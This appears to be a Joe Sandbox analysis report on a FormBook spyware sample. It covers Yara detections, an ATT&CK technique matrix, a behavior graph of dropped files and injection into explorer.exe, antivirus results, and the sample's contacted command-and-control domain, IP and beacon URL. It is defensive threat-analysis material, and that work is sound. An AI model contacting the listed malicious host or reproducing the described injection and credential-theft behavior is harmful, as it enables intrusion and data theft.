            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 0.2.New_1007572_021.exe.3eb8b30.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.FB_5E87.tmp.exe.1080000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.0.FB_5E87.tmp.exe.1080000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.New_1007572_021.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.New_1007572_021.exe.3bc9930.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.New_1007572_021.exe.3d7bea0.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.New_1007572_021.exe.3d06480.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000013.00000002.926228324.0000000004F0F000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.925005416.0000000000278000.00000004.00000020.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.821727953.0000000001081000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.821846658.00000000012B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.740535210.0000000000404000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.925127682.0000000000490000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.926114786.0000000004BA0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.821488799.0000000000E10000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.925530735.00000000031B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.739038576.0000000003BCD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000000.740219963.0000000001081000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.739831969.0000000003EBC000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.739343756.0000000003D06000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe, type: DROPPED

            Remote Access Functionality:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 0.2.New_1007572_021.exe.3eb8b30.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.FB_5E87.tmp.exe.1080000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.0.FB_5E87.tmp.exe.1080000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.New_1007572_021.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.New_1007572_021.exe.3bc9930.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.New_1007572_021.exe.3d7bea0.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.New_1007572_021.exe.3d06480.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000013.00000002.926228324.0000000004F0F000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.925005416.0000000000278000.00000004.00000020.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.821727953.0000000001081000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.821846658.00000000012B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.740535210.0000000000404000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.925127682.0000000000490000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.926114786.0000000004BA0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.821488799.0000000000E10000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.925530735.00000000031B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.739038576.0000000003BCD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000000.740219963.0000000001081000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.739831969.0000000003EBC000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.739343756.0000000003D06000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe, type: DROPPED

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsShared Modules1Path InterceptionProcess Injection712Rootkit1Credential API Hooking1Security Software Discovery221Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading1Input Capture1Process Discovery2Remote Desktop ProtocolInput Capture1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesArchive Collected Data1Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion31NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection712LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Information Discovery112VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information4DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing13Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Timestomp1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 458848 Sample: New_1007572_021.exe Startdate: 03/08/2021 Architecture: WINDOWS Score: 100 54 Found malware configuration 2->54 56 Malicious sample detected (through community Yara rule) 2->56 58 Multi AV Scanner detection for submitted file 2->58 60 5 other signatures 2->60 11 New_1007572_021.exe 5 2->11         started        process3 file4 40 C:\Users\user\AppData\...40ew_1007572_021.exe, PE32 11->40 dropped 42 C:\...42ew_1007572_021.exe:Zone.Identifier, ASCII 11->42 dropped 44 C:\Users\user\...44ew_1007572_021.exe.log, ASCII 11->44 dropped 72 Writes to foreign memory regions 11->72 74 Injects a PE file into a foreign processes 11->74 15 New_1007572_021.exe 1 5 11->15         started        signatures5 process6 dnsIp7 48 192.168.2.1 unknown unknown 15->48 36 C:\Users\user\AppData\...\FB_5E87.tmp.exe, PE32 15->36 dropped 38 C:\Users\user\AppData\...\FB_5908.tmp.exe, PE32 15->38 dropped 50 Multi AV Scanner detection for dropped file 15->50 52 Machine Learning detection for dropped file 15->52 20 FB_5E87.tmp.exe 15->20         started        23 FB_5908.tmp.exe 15->23         started        file8 signatures9 process10 signatures11 62 Antivirus detection for dropped file 20->62 64 Multi AV Scanner detection for dropped file 20->64 66 Machine Learning detection for dropped file 20->66 68 5 other signatures 20->68 25 explorer.exe 20->25 injected process12 dnsIp13 46 www.comfsresidential.com 185.53.178.50, 49760, 80 TEAMINTERNET-ASDE Germany 25->46 70 System process connects to network (likely due to code injection or exploit) 25->70 29 cscript.exe 25->29         started        signatures14 process15 signatures16 76 Modifies the context of a thread in another process (thread injection) 29->76 78 Maps a DLL or memory area into another process 29->78 80 Tries to detect virtualization through RDTSC time measurements 29->80 32 cmd.exe 1 29->32         started        process17 process18 34 conhost.exe 32->34         started       

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            New_1007572_021.exe28%ReversingLabsByteCode-MSIL.Spyware.Noon
            New_1007572_021.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe100%AviraTR/Crypt.ZPACK.Gen
            C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\New_1007572_021.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\FB_5908.tmp.exe5%MetadefenderBrowse
            C:\Users\user\AppData\Local\Temp\FB_5908.tmp.exe2%ReversingLabs
            C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe49%MetadefenderBrowse
            C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe86%ReversingLabsWin32.Trojan.FormBook
            C:\Users\user\AppData\Local\Temp\New_1007572_021.exe28%ReversingLabsByteCode-MSIL.Spyware.Noon

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            0.2.New_1007572_021.exe.2d49d5c.1.unpack100%AviraTR/Dropper.GenDownload File
            0.2.New_1007572_021.exe.3eb8b30.6.unpack100%AviraTR/Crypt.XPACK.Gen2Download File
            10.2.FB_5E87.tmp.exe.1080000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
            10.1.FB_5E87.tmp.exe.1080000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            10.0.FB_5E87.tmp.exe.1080000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
            8.2.New_1007572_021.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
            0.2.New_1007572_021.exe.3bc9930.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://www.fontbureau.comF0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.fontbureau.comiona0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.fontbureau.come.comE0%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.comfsresidential.com/cg53/?y48=RnXd-dV8&04VdoL_=jL4gYOGdbdGLgCuh81HWgUyhq6g08d9KQ1n+auYX12/KRBTZXwpphFOeP1KBAJVgFN6h0%Avira URL Cloudsafe
            http://www.%s.comPA0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.comfsresidential.com
            		185.53.178.50
            		truetrue
              		unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://www.comfsresidential.com/cg53/?y48=RnXd-dV8&04VdoL_=jL4gYOGdbdGLgCuh81HWgUyhq6g08d9KQ1n+auYX12/KRBTZXwpphFOeP1KBAJVgFN6htrue
              • Avira URL Cloud: safe
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://www.apache.org/licenses/LICENSE-2.0New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpfalse
                		high
                http://www.fontbureau.comNew_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpfalse
                  		high
                  http://www.fontbureau.com/designersGNew_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpfalse
                    		high
                    http://www.fontbureau.comFNew_1007572_021.exe, 00000000.00000002.738485693.00000000012F7000.00000004.00000040.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.fontbureau.com/designers/?New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpfalse
                      		high
                      http://www.founder.com.cn/cn/bTheNew_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.fontbureau.com/designers?New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpfalse
                        		high
                        http://www.tiro.comexplorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.fontbureau.com/designersexplorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpfalse
                          		high
                          http://www.goodfont.co.krNew_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.comionaNew_1007572_021.exe, 00000000.00000002.738485693.00000000012F7000.00000004.00000040.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.carterandcone.comlNew_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.sajatypeworks.comNew_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.typography.netDNew_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.com/designers/cabarga.htmlNNew_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpfalse
                            		high
                            http://www.founder.com.cn/cn/cTheNew_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.galapagosdesign.com/staff/dennis.htmNew_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://fontfabrik.comNew_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.founder.com.cn/cnNew_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designers/frere-user.htmlNew_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpfalse
                              		high
                              http://www.fontbureau.come.comENew_1007572_021.exe, 00000000.00000002.738485693.00000000012F7000.00000004.00000040.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.jiyu-kobo.co.jp/New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.galapagosdesign.com/DPleaseNew_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.com/designers8New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpfalse
                                		high
                                http://www.%s.comPAexplorer.exe, 0000000B.00000000.785548112.0000000002B50000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                		low
                                http://www.fonts.comNew_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpfalse
                                  		high
                                  http://www.sandoll.co.krNew_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.urwpp.deDPleaseNew_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.zhongyicts.com.cnNew_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.sakkal.comNew_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown

                                  Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public

                                  IPDomainCountryFlagASNASN NameMalicious
                                  185.53.178.50
                                  		www.comfsresidential.comGermany
                                  		61969TEAMINTERNET-ASDEtrue

                                  Private

                                  IP
                                  192.168.2.1

                                  General Information

                                  Joe Sandbox Version:33.0.0 White Diamond
                                  Analysis ID:458848
                                  Start date:03.08.2021
                                  Start time:19:47:24
                                  Joe Sandbox Product:CloudBasic
                                  Overall analysis duration:0h 11m 32s
                                  Hypervisor based Inspection enabled:false
                                  Report type:light
                                  Sample file name:New_1007572_021.exe
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                  Number of analysed new started processes analysed:22
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • HDC enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
